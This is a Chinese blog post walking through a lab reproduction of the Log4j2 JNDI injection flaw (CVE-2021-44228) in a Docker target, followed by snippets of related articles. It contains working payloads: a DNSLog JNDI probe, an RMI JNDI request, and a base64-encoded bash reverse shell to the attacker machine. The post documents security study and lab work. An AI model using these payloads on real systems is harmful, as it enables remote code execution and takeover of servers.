Log4j2学习与复现

已于 2022-07-25 01:51:57 修改
阅读量3.6k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 信息安全漏洞 代码审计与漏洞分析 文章标签: log4j2 漏洞复现 java
于 2022-02-28 14:26:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49422880/article/details/123180416
本文档详细记录了Log4j2漏洞的复现过程,包括Dockerfile和docker-compose.yml的编写,环境搭建,利用JNDI进行数据外带和反弹shell的步骤。实验中,通过修改端口避免冲突,并使用特定工具生成恶意代码,最终成功反弹shell获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Log4j2学习与复现

0x01 前言

  这几天在给新生赛出题,打算出real world的题目。就顺便把real world的赛题给复现一遍。网上其实也有很多的教程主要是环境的搭建以及Dockerfile和docker-compsoe.yml的编写。

实验环境:
| 环境 | 版本 | IP|
|–|–|–|–|
|靶场|ubuntu 18 & vulfocus/log4j2-cve-2021-44228| 192.168.43.139|
|攻击机 |kali Linux 2021 | 192.168.43.77 |
工具下载:JNDI.

0x02 Dokerfile的编写

Dokerfile

FROM vulfocus/log4j2-cve-2021-44228

RUN apt-get update

COPY flag /flag

因为还不是很熟悉原理是什么,无法完全地构建本地靶场,用的还是vulfocus下的镜像。这一个镜像默认打开的端口是8080,为了避免冲突在docker-compsoe.yml中我们需要做一个端口映射。

0x03 docker-compsoe.yml的编写

docker-compsoe.yml

version: "2"

services:
  log4j2:
    build: .
    restart: "always"
    ports:
      - "9999:8080"

这里我把原来的端口映射到了9999端口,本地再放一个flag文件。
在这里插入图片描述

0x05 复现

1.化境启动

到那一个目录下输入docker-compose build 拉取相关的镜像
在这里插入图片描述
然后 docker images查看是否拉取成功。
在这里插入图片描述
接着docer-compose up -d,直接启动环境
再使用docker ps -a 进行容器的查看
在这里插入图片描述
成功构建该容器,然后使用win7物理机查看。构建成功。
在这里插入图片描述

2.复现

1、首先查看是否能外带出数据(靶场绝对是可以的)
这里的靶场环境是get传参数,那么是要进行一次的url编码。

hello?payload=${jndi:ldap://y5bapy.dnslog.cn/exp}

刷新一下,去dnslog就能看到有外带的数据。
在这里插入图片描述

在这里插入图片描述
2、接下来需要构建一个恶意数据进行数据监听,构造payload,这里是直接构造反弹shell的恶意代码。
工具下载:git clone https://gitee.com/Lemon_i/JNDI-Injection-Exploit.git
然后打包项目:mvn clean package -DskipTests
如果提示没有mvn的话就下一个:apt-get install maven
在这里插入图片描述
开始构造恶意数据。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjc3LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.43.77"

echo 后面的一串字符串YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjc3LzEyMzQgMD4mMQ==是恶意代码
bash -i >& /dev/tcp/192.168.43.77/1234 0>&1的base64的编码。-A 之后的那一串IP就是攻击机的IP地址,按照这个去构造基本就可以了。
在这里插入图片描述
最后虚拟机监听端口使用上面生成的恶意代码向服务器发送即可反弹shell。

url/hello/?payload=%24%7Bjndi%3Armi%3A%2F%2F192.168.43.77%3A1099%2FExploitBypass%7D

在这里插入图片描述
成功反弹,拿到flag。

0x06 原理分析

持续更新

漏洞复现】Apache Log4j2 远程代码执行漏洞
李火火的安全圈
07-20 1128
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
复现】Apache Log4j2 远程代码执行漏洞
趣学程序
12-14 971
Apache Log4j2 远程代码执行漏洞 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞影响版本: 2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 复现 仅个人学习总结 效果 MyServer.java package server;
log4j2 实际使用详解
热门推荐
人不风流枉少年
05-12 14万+
一、目录简介 基础部分 日志框架简单比较(slf4j、log4j、logback、log4j2log4j2基础知识 log4j2实用配置 实战部分 slf4j + log4j2 实际使用 二、日志框架比较(slf4j、log4j、logback、log4j2 ) 日志接口(slf4j) slf4j是对所有日志框架制定的一种规范、标准、接口,并不是一个框架的具体的实现,因为接口并不能独立使
log4j2复现
weixin_65219040的博客
06-18 666
目录环境搭建log4j2 DNSLog测试JNDI注入反弹shell 靶机:Ubuntu 5.4.0-117-generic   192.168.6.183 攻击机:Kali 5.16.0-kali7-amd64 192.168.6.212 靶机: #首先拉一个docker镜像 docker pull vulfocus/vulfocus #查看镜像 docker images #启动 docker run -d -p 8081:80 -v /var/run/docker.sock:/var
log4j2问题复现
weixin_44676079的博客
12-14 293
log4j2BUG
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 1000
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现漏洞
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6935
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
Log4J2 靶场漏洞复现
weixin_47019868的博客
12-18 1万+
北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 在Kali系统
log4j2漏洞复现
qq_60905276的博客
09-24 1096
log4j2log4j的升级版本,基于java的日志框架,在java项目中被大量的引用,当用户输入数据被记录于日志中,攻击者可通过构造特殊请求,造成JNDI注入,来触发log4j达到命令执行,JNID可访问的目录服务有lLDAP,JDBC,RMI,DNS,NIS,CORBA,JNDI是java提供的一个java命令和目录接口,可通过其调用定位资产和程序对象。
log4j2复现(小宇特详解)
小宇的web博客
02-19 842
log4j2复现(小宇特详解) 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架Web应用中。 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 log4j2是调用了jndi来查询一些信息然后记录到了日志里面。 jndi是java一套资源和使用的接口,用来将各种资源做整合 idap是一种文件访问协议,用来获取文件资源 rmi是远程方法执行,是RPC的纯java实现方
Log4j2漏洞复现(CVE-2021-44228)
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
log4j2的使用
chens616的专栏
07-19 3186
log4j2简介 logback是由log4j的创始人开发的新日志框架,包括三个模块: logback-core logback-classic logback-access logback-core是核心模块,logback-classic是日志框架,相当于log4j,logback很好的实现了slf4j,logback-access提供跟web 容器有关的日志访问功能。 logbackl...
最详细的log4j2配置文件说明(可以直接套用)
朗朗繁星的博客
10-30 1万+
将配置文件命名为log4j2-spring.xml并将其放在(resources)资源根目录下,spring会自动读取这个文件作为log4j2日志框架的配置文件,如果要自定义配置文件名如“log4j2-test.xml”,请在application.yml加上以下配置: logging: config: classpath:log4j2-test.xml 以下是xml文件详解,可以不做修改直接套用到任何项目: <?xml version="1.0" encoding="UTF-8"?>
Log4j2 复现基础原理
weixin_45751765的博客
01-17 1486
0x00 实操 因为是java小白,所以先照着文章复现了 环境搭建 docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker exec -it log4j_vuln_container /bin/
log4j2 jndi注入复现代码
最新发布
01-28
### log4j2 JNDI 注入漏洞复现示例代码 为了展示如何通过特定配置和代码片段来重现Log4j2中的JNDI注入漏洞,以下是具体的Java应用程序实例: #### Java 应用程序设置 首先创建一个简单的Spring Boot项目或任何标准的Maven/Gradle构建工具支持的应用。确保`pom.xml`文件中包含了对log4j-core库版本低于2.15.0依赖项。 ```xml <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.14.1</version><!-- 漏洞版本 --> </dependency> ``` #### 配置日志记录器 在项目的资源路径下放置名为`log4j2.xml`的日志配置文件,内容如下所示[^1]: ```xml <?xml version="1.0" encoding="UTF-8"?> <Configuration status="WARN"> <Appenders> <Console name="Console" target="SYSTEM_OUT"> <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/> </Console> </Appenders> <Loggers> <Root level="error"> <AppenderRef ref="Console"/> </Root> </Loggers> </Configuration> ``` #### 编写易受攻击的代码逻辑 编写一段会触发该安全问题的服务端点或者控制台应用入口函数,这里以最简单的方式为例,在main方法里调用了Logger对象并传入含有`${}`占位符表达式的字符串作为消息参数[^2]: ```java import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class VulnerableApplication { private static final Logger logger = LogManager.getLogger(VulnerableApplication.class); public static void main(String[] args){ String userInput = "${jndi:ldap://localhost:1389/a}"; logger.error(userInput); } } ``` 当上述代码被执行时,如果存在恶意服务器监听指定LDAP地址,则可能造成远程命令执行的风险。注意这只是一个用于学习目的的安全研究案例,请勿非法使用此技术危害他人系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值